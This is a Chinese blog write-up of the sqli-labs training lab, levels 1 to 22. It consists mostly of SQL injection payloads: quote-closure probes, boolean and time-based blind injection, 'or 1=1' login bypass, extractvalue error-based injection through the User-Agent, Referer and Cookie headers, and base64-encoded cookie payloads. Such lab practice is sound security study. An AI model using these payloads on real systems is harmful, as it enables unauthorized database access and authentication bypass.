sql-lab Page-1

最新推荐文章于 2024-11-20 17:38:33 发布
原创 最新推荐文章于 2024-11-20 17:38:33 发布 · 485 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了多种SQL注入攻击手法,包括字符型、数字型、布尔盲注、时间盲注等,展示了如何构造payload来利用这些漏洞,同时涉及了万能钥匙、报错注入和特殊场景下的注入技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-1

字符型注入,‘

payload:?id=1'and 1%23

Less-2

数字型注入

payload:?id=1 and 1
        ?id=1 and 0

Less-3

字符型注入

payload:?id=1')and 1 %23
        ?id=1')and 0 %23

Less-4

字符型注入

payload:?id=1")and 1%23
        ?id=1")and 0%23

Less-5

布尔盲注和时间盲注

payload:?id'and 1%23
        ?id'and 0%23
        ?id'and sleep(5)%23

Less-6

布尔盲注和时间盲注

payload:?id=1"and 1%23
        ?id=1"and 0%23
        ?id=1"and sleep(5)%23

Less-7

布尔盲注和时间盲注

payload:?id=1'))and 1%23
        ?id=1'))and 0%23
        ?id=1'))and sleep(5)%23

Less-8

时间盲注

payload:?id=1'and 1%23
        ?id=1'and 0%23
        ?id=1'and sleep(5)%23

Less-9

时间盲注

payload:?id=1'and sleep(5)%23

Less-10

时间盲注

payload:?id=1"and sleep(5)%23

Less-11

万能钥匙

payload:
    username:'or 1=1#
    password:123

Less-12

报错注入,字符型注入

payload:
    username:")or 1#
    password:123

Less-13

报错注入,字符型注入,时间盲注

payload:
    username:')or 1#
    password:123

    username:')or sleep(5)#
    password:123

Less-14

字符型注入,报错注入,时间盲注,布尔盲注

payload:
    username:"or 1#
    password:123

Less-15

字符型注入,时间盲注,布尔盲注

payload:
    username:' or 1#
    password:123

Less-16

字符型注入,时间盲注,布尔盲注

payload:
    username:")or 1#
    password:123

Less-17

字符型注入,报错注入,时间盲注

payload:
    username:admin
    newpassword:'or 1#

    username:admin
    newpassword:'or sleep(5)#

Less-18

查看源代码:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

发现user-agent后还有两个字段

user-agent注入,报错注入,需要登录一个对的用户

payload:
通过抓包修改user-agent
1',(extractvalue(1,concat(0x7e,(select database()),0x7e))),(extractvalue(1,concat(0x7e,(select user()),0x7e))))#

Less-19

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

查看代码,发现Referer后还有一个字段

报错注入,Referer注入

payload:
抓包修改Referer的值
1',(extractvalue(1,concat(0x7e,(select database()),0x7e)))#

Less-20

报错注入,时间盲注

先登录一个存在的账户,发现会出现i love you cookie

应该是cookie注入

抓包修改cookie的值

payload:
    Cookie: uname=admin' and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #

Less-21

时间盲注,cookie注入,报错注入

抓包修改cookie的值

直接注入发现报错,编码不对,查看源码后发现,cookie进行了base64加密,所以构造payload的时候也需要使用base64进行加密

payload:
    延迟注入:')or sleep(5)#
        YWRtaW43JylvciBzbGVlcCg1KSM=
    字符型注入:')or 1#
        YWRtaW43JylvciAxIw==
    报错注入:')or (extractvalue(1,concat(0x7e,(select database()),0x7e)))#
        YWRtaW43JylvciAoZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkpIw==

时间盲注:

字符型注入:

报错注入:

Less-22

抓包修改cookies,同Less-21关

payload:
    报错注入:admin7"or (extractvalue(1,concat(0x7e,(select database()),0x7e)))#
            YWRtaW43Im9yIChleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSkj
    时间盲注:admin7"or sleep(5)#
            YWRtaW43Im9yIHNsZWVwKDUpIw==

报错注入:

时间盲注:

Sql-labs 靶场搭建及通关
m0_74825074的博客
01-21 1287
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test。
sql-labs靶场环境搭建(手把手教你如何搭建)
热门推荐
Joker_Dgh的博客
04-02 4万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
LabSQL数据库工具包(完整版)
07-25
下载后直接将解压文件夹复制到labview安装文件目录下的user.lib,例如C:\Program Files\National Instruments\LabVIEW 8.6\user.lib,其他版本亦然 LabSQL 1.1a,网上这个版本很多,但大多数资源都缺几个函数,完整版的大小1.11MB,如果有大小是1.1MB的版本,它里面肯定缺几个函数,分别是查找记录:ADO Recordset Find.vi;删除记录:ADO Recordset Delete Record.vi;添加新记录:ADO Recordset Addnew.vi;设定字段:ADO Set Field Value.vi。大家下载时请注意
sql-lab(ALL 1-65)
lee_maple的博客
03-08 9775
less-1(基于错误的GET单引号字符型注入) id=1 //回显正常 id=1' //报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 id=1' order by 4 # //用
Sql-lab全解
qq_59197927的博客
10-11 685
id=-1 union select null,null,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+group_concat()为输出格式 information_scheam这是个数据库中的表存放着数据库中各个表的信息。这里使用'")判断可能为数值型注入,也就不需要考虑闭合方式,回显大小为3位,位置后两位。
sql-labs
qq_62553635的博客
11-05 234
​​​​​​SQLi-LABS Page-1(Basic Challenges) 第一题 根据题目提示,先单引号测试 说明单引号被数据库成功解析, 使用联合表的方式来提取自己想要的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。 查字段运用order by 语句。直到order by 4--+时报错,说明只有3个字段。 把原始语句的的结果变为空 接下来查数据库 查表名 使用Group...
sql-lab靶场
Zx244349115的博客
11-09 1099
然后我输入id=1’–+时报错,这时候我们可以输入id=1’)–+发现依然报错,之时我试试是不是双括号输入id=1’))–+,发现页面显示正常。使用新的参数sort,通过输入1,2,3表中出现不同数据,该sql语句是order by,sql语句参数没有引号且不能使用联合注入,有报错显示,所以我们可以使用updatexml进行报错。if(a,sleep(10),1)如果a结果是真的,那么执行sleep(10)页面延迟10秒,如果a的结果是假,执行1,页面不延迟。也是不支持的,因此也可以使用。
sqli-lab靶场学习(一)——Less1-4(语句闭合,联合注入)
sadoshi的专栏
09-03 1063
最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习。
SQL联合注入详解-结合SQLi-lab less1
weixin_45118086的博客
07-09 377
SQL注入详解 首先看一看能不能注入 127.0.0.1/sqli-labs/Less-1/?id=1 order by 3 --+ 发现输入多少都不报错 所以推测应该是字符注入 通过以下两句,判断出字段数为3(order by 4报错) 127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ 127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+ 看一下注入点 127.0.0.1/sqli-labs/Less-1/?id=
sql-lab (36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别(后持续更新)
m0_62879498的博客
01-20 735
(36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别 sql-lab-36 和前面的关卡一样,本题对 ’ 进行了注入,我们可以利用以前学过的办法,使用 %df 进行一个绕过。 判断注入点:?id=1 %df’ and 1=2 – q 判断字段数:id=1 %df’ order by 4-- q 判断显错位:?id=-1 %df’ union select 1,2,3-- q 判断库名:?id=-1 %df’ union select 1,datab
sql-lab 1~10总结(后续持续更新)
m0_62879498的博客
12-11 772
sql注入的一般流程: (1~6关) 判断注入点 当 id=1 and 1=2 – q页面异常是可能存在在sql注入 若页面出现非法,使用其他注入。 判断字段数 order by (根据指定的列对结果进行排序),输出的数字超过列数,报错,因此可以借助此特性,进行列数的判断。 判断回显点 eg: union select 1,2,3 页面显示2,说明回显点在2 注意:要让id的值等于一个不存在的值,这样联合查询的返回值会让union之后的查询结果在数组的第一列。只有让id的只是一个不
sql-lab 通关Less1 -65(深入学习)
ST0new的博客
10-02 2万+
文章目录sql-lab 复现通关(深入学习)前言目的less-1 基于错误的单引号字符串Less-2 基于错误的get整型注入Less-3 基于错误的get单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 ...
sql-labs(1-65)
Yb_140的博客
03-05 7640
目录 Less-1 Less-2 Less-3 Less-4 Less-5 Less-6 Less-7 Less-8 Less-9 Less-10 Less-11 Less-12 Less-13 Less-14 Less-15 Less-16 Less-17 Less-18 Less-19 Less-20 Less-21 Less-22 Less-23 Less-24 Less-25 Less-25a Less-26 Less-26a Less-2.
Sqli-lab详解(持续更新ing)
weixin_66022252的博客
09-02 2161
根据学习进度会持续更新ing
sql-lab靶场讲解
CN天狼
12-16 7040
sql-lab讲解
sql-lab记录
JDWDXN的博客
10-12 428
sql-lab记录 less7-写文件 secure_file_priv= 默认为空 效果一样,除非=www,否则路径都比较麻烦,只好用…/构造写入www目录中 注意Null和空是两回事,Null根本就没法写入 直接www目录会报错,phpstudy无法设置 所以这里的路径一定要写绝对路径(这里有点奇怪,可以直接设置“/”,为磁盘目录,可据此设置绝对路径)或相对路径,一般这里都是空或者“/”,即需要构造路径以利用 爆路径 id=-1’) union select 1,2,’<?php @eval.
Sql-lab全解_sqllab
2301_77033340的博客
04-12 957
这里推荐在password注入,因为会判断密码和账户的正确性,正确才会回显,如果这里在username注入则会比较麻烦经过测试这里回显位为2位得到数据库名称,和当前表名称得到表列得到数据。
Sql-lab全解_sqllab(3),GitHub标星1w的网络安全架构师必备技能
04-06 890
这里uname被过滤了直接在passwd注入这里看到注入语句前面是updata采用报错注入最后爆出数据表的时候会报一个错误这里是数据库做了一个限制不允许读users表可以使用别名绕过将users表中的数据username和password存到一个别名为a的表中,这个时候就绕过了。
sqli-lab基础篇(1-20)
最新发布
qq_43400789的博客
11-20 1070
数据库长度爆破(数据库长度为8)抓get请求包,修改cookie。爆破数据名(security)查看表的长度、表名、列名、数据。判断回显位置(无回显)
深入探索Anz-cm-lab的PHP开发实例
文件名"anz-cm-lab-master"表明这可能是一个包含多个文件的项目源代码仓库。由于缺少详细的描述,我们将重点放在与PHP相关的内容上,尤其将围绕"anz-cm-lab"这一主题展开讨论,虽然无法提供具体细节,但我们可以探讨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值